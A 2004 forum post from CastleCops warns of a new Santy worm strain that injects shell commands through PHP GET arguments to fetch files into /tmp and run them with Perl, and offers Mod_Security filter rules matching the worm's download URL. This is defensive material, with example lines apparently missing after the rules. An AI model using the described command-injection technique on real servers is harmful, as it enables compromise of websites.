On behalf of the Security Community I have been asked to spread the word on this threat as it is very real and growing worse as time passes.

Posted on Saturday, 25 December 2004 @ 16:33:38 EST by Paul Laudanski at http://castlecops.com/

Folks, it seems that Santy worm has taken on a new strain. It also searches Yahoo now in addition to Google, but it looks for any PHP scripts with all possible arguments passed thru in the HTTP GET. This worm tries all arguments in your PHP script to throw in a shell commands that access a particular website, download some text files into /tmp, and then execute them using Perl. If you are using Mod_Security, you might want to try something like this (its working for us so far):

SecFilter "visualcoders\.net/spy\.gif\?\&cmd"
SecFilter ":/"
Just in case the URL changes, the latter should still get all sorts of:


Naturally, the latter also filters on


It is Christmas after all, so a quick patch to throw HTTP 406s at the requester works thru the above..

The new strain is now called Santy.c

Merry Christmas and be prepared.